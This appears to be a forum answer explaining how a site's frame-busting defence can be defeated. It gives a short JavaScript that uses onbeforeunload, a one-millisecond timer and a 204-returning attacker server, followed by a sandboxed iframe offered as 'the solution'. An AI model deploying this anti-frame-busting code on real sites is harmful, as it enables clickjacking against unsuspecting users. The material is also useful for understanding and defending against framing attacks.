As per Jeff's question:

As it turns out, your frame-busting code can be busted, as shown here:

<script type="text/javascript">
    var prevent_bust = 0  
    window.onbeforeunload = function() { prevent_bust++ }  
    setInterval(function() {  
      if (prevent_bust > 0) {  
        prevent_bust -= 2  
        window.top.location = 'http://server-which-responds-with-204.com'  
      }  
    }, 1)  
</script>

This code does the following:

• increments a counter every time the browser attempts to navigate away from the current page, via the window.onbeforeonload event handler
• sets up a timer that fires every millisecond via setInterval(), and if it sees the counter incremented, changes the current location to a server of the attacker's control
• that server serves up a page with HTTP status code 204, which does not cause the browser to navigate anywhere

This is the solution to your problem, I hope it helped!

<iframe src="URL" sandbox="allow-scripts" width="100%" height="100%" scroll="yes" frameborder="0"></iframe>